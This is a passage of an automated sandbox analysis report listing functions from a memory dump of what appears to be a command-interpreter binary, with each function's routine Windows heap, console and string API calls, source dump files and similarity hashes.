                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2a1de4728820338b27de8992b9b52b3e68fe175597c256973e4173a8bfb22287
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5301D671904320AFE7206BA8AC4DB9F7BA8EB46736F204315F421E31E0EBB848058695
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 000324F6 Relevance: 6.0, APIs: 4, Instructions: 36memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,000322F8), ref: 00032514
                                                                                                                                                                                                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000,?,?), ref: 0003251B
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,000322F8), ref: 00032539
                                                                                                                                                                                                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000), ref: 00032540
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$FreeProcess
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3859560861-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: a5fdaa20d89ff10b87c45544cee45c6f39f15c5b6e2b5ee801ada4cda7ccab66
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 95f018f8920ce0ea5662978d4ad49699911adac87145fffc9b3bea8f8b3d280c
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a5fdaa20d89ff10b87c45544cee45c6f39f15c5b6e2b5ee801ada4cda7ccab66
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E3F04F72610701AFEB149FA1EC88B66B7F8FF49313F100A2EE241C6040D778E995CBA5
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00018B96 Relevance: 6.0, APIs: 4, Instructions: 30memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000004,?,0001885E), ref: 00018B9D
                                                                                                                                                                                                                                                                                                                                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0001885E), ref: 00018BA4
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001A9D4: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,00000000,0001A9C5), ref: 0001A9D8
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001A9D4: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000,00000000), ref: 0001A9F3
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001A9D4: RtlAllocateHeap.NTDLL(00000000), ref: 0001A9FA
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001A9D4: memcpy.MSVCRT(00000000,00000000,00000000), ref: 0001AA09
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001A9D4: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000), ref: 0001AA12
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?,0001885E), ref: 0002B5B5
                                                                                                                                                                                                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000,?,0001885E), ref: 0002B5BC
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$Process$EnvironmentFreeStrings$AllocAllocatememcpy
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3480822025-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: d278f9bc2f3c61b370dd14053cfde54f9a58d0a447926a99422a165884ce3a84
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: a9b4db04ca7b7f53877834f05e1ac1aa952fa225ba71f848d76dfdcfd3365d45
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d278f9bc2f3c61b370dd14053cfde54f9a58d0a447926a99422a165884ce3a84
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F9E09232349B2167EB603BB47C0DB8B2A949F42723F150512F384C91C0DE28C88087A6
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00026860 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00026F48: GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 00026F4F
                                                                                                                                                                                                                                                                                                                                                                                                                          • __set_app_type.MSVCRT ref: 00026872
                                                                                                                                                                                                                                                                                                                                                                                                                          • __p__fmode.MSVCRT ref: 00026888
                                                                                                                                                                                                                                                                                                                                                                                                                          • __p__commode.MSVCRT ref: 00026896
                                                                                                                                                                                                                                                                                                                                                                                                                          • __setusermatherr.MSVCRT ref: 000268B7
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1632413811-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: c60dcc8cdc9da873be5af59f4a1cf36d7627e3749c73d6f7280db3dff7f60953
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 9044a72da91ff2c8082d2523e2c72a5eba3d71f003670fb478cb08c36c469bb9
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c60dcc8cdc9da873be5af59f4a1cf36d7627e3749c73d6f7280db3dff7f60953
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1DF09E756093908FEB556F30FD0A6493B65BB0A326B100B59F561862F2DF7E9540CA12
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00039F18 Relevance: 6.0, APIs: 4, Instructions: 24COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00039F24
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,0003449C,?,?,00000001,?), ref: 00039F2C
                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00039F42
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,0003449C,?,?,00000001,?), ref: 00039F4A
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ConsoleMode_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1606018815-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 3b21c958cda7138cf7bfc41aa99324f7f70a59386a96db57d049412d5230f909
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: b1d17696d270349c6296c102b5efc8ed0f6e9c806520a1fcbf1832ab694b92a6
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3b21c958cda7138cf7bfc41aa99324f7f70a59386a96db57d049412d5230f909
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E4E04F71600305FFEB009BB0EC0EB9B776CEB45326F100615F525D60D1DAB9D900DA21
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00018235 Relevance: 6.0, APIs: 4, Instructions: 17COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 0001824E
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00018256
                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00018264
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 0001826C
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ConsoleMode_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1606018815-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 9db2dfb31e231dd959f6cfc34a616331f68945a8e86683da2c5aae6d655c90d9
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 01d5c5c454ebe8dac0cfef4b0ac78128da7c6975567fc40eb7b6c4e540107fbc
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9db2dfb31e231dd959f6cfc34a616331f68945a8e86683da2c5aae6d655c90d9
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5CE002F96146049FFB449BA0EE1DA563B64EB4A316F404609F205861A1DBBD6410DF16
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 000172C6 Relevance: 6.0, APIs: 4, Instructions: 15memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,0001729C), ref: 000172CF
                                                                                                                                                                                                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000), ref: 000172D6
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 000172DF
                                                                                                                                                                                                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000), ref: 000172E6
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$FreeProcess
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3859560861-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 58cddacc3e64e5c49b6612dcb1e9bac669b652266ede0044f7cce395e8ef0d84
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: a3f47da9df48f54bfcfed544cb1781bc028b31111170a5a9e35d257a3516f216
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 58cddacc3e64e5c49b6612dcb1e9bac669b652266ede0044f7cce395e8ef0d84
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4ED0C932605710ABEF503FE0BC0DF8B3E28EF4B313F110A03F205820608ABC48008B66
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00019CC0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 191COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0001ACD8,00000001,?,00000000,00018C23,-00000105,0003C9B0,00000240,00021E92,00000000,00000000,0002ACE0,00000000), ref: 0001DCE1
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0001ACD8,00000001,?,00000000,00018C23,-00000105,0003C9B0,00000240,00021E92,00000000,00000000,0002ACE0,00000000,00000000), ref: 0001DCE8
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001A62F: wcschr.MSVCRT ref: 0001A635
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001C570: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 0001C5BD
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001C570: RtlFreeHeap.NTDLL(00000000), ref: 0001C5C4
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001C570: _setjmp3.MSVCRT ref: 0001C630
                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsupr.MSVCRT ref: 0002C21F
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00021A47: memset.MSVCRT ref: 00021AE2
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00021A47: ??_V@YAXPAX@Z.MSVCRT(00022229,?,00022229,00000000,-00000105,?,00000000,00000000), ref: 00021BA4
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$Process$AllocFree_setjmp3_wcsuprmemsetwcschr
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: FOR$ IF
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3818062306-2924197646
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 0013573e44aa6799f670d473723e2788905569f89526c00ecbcbdff0ba1a21ce
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 7bb0c81c329bc4c2273c032bb4c668eeda5df26b713e7a4724e2c448577eae91
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0013573e44aa6799f670d473723e2788905569f89526c00ecbcbdff0ba1a21ce
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 60513A2170021296EBB56B78E862BFF32E2EF91754F580125E906CB295FF62DDC1C391
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 0003BED0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 183COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0001ACD8,00000001,?,00000000,00018C23,-00000105,0003C9B0,00000240,00021E92,00000000,00000000,0002ACE0,00000000), ref: 0001DCE1
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0001ACD8,00000001,?,00000000,00018C23,-00000105,0003C9B0,00000240,00021E92,00000000,00000000,0002ACE0,00000000,00000000), ref: 0001DCE8
                                                                                                                                                                                                                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 0003BF88
                                                                                                                                                                                                                                                                                                                                                                                                                          • memcpy.MSVCRT(00000000,?,00039E02,0003CD80,00000030,0003448F,?,?,?,00000001), ref: 0003C008
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$AllocProcessmemcpywcschr
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: &()[]{}^=;!%'+,`~
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3241892172-381716982
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: c0e4adcba90a1d96f8accebd150ee97f99ff810cf587d73e95a1655cd6bc4862
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 210ebaaedaa09ed77e1870b5ae343344c63a46021c28248fa82945956f822658
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c0e4adcba90a1d96f8accebd150ee97f99ff810cf587d73e95a1655cd6bc4862
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8361ACB4E04219CFDF29CF68D890AADBBF9EF49314F20512EE806E7250EB3599418F54
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 0001ABC0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 112COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 0001ABE3
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001BC30: wcschr.MSVCRT ref: 0001BCA7
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001BC30: iswspace.MSVCRT ref: 0001BD1D
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001BC30: wcschr.MSVCRT ref: 0001BD39
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001BC30: wcschr.MSVCRT ref: 0001BD5D
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001CF10: _setjmp3.MSVCRT ref: 0001CF28
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001CF10: iswspace.MSVCRT ref: 0001CF6B
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001CF10: wcschr.MSVCRT ref: 0001CF8D
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001CF10: iswdigit.MSVCRT ref: 0001CFEE
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0001ACD8,00000001,?,00000000,00018C23,-00000105,0003C9B0,00000240,00021E92,00000000,00000000,0002ACE0,00000000), ref: 0001DCE1
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0001ACD8,00000001,?,00000000,00018C23,-00000105,0003C9B0,00000240,00021E92,00000000,00000000,0002ACE0,00000000,00000000), ref: 0001DCE8
                                                                                                                                                                                                                                                                                                                                                                                                                          • longjmp.MSVCRT(00050A30,00000001,00000000,00000000,00000002), ref: 0002CB58
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: wcschr$Heapiswspace$AllocProcess_setjmp3_wcsicmpiswdigitlongjmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: REM/?
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 49548326-4093888634
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: c0413f17ef81cbfb8dfcbde39ea8ecc813796747982079873b953564d54f7939
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: a1d8225c73a72e531bd660632d149036422d028fcbd84863a627ce71c8dc236b
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c0413f17ef81cbfb8dfcbde39ea8ecc813796747982079873b953564d54f7939
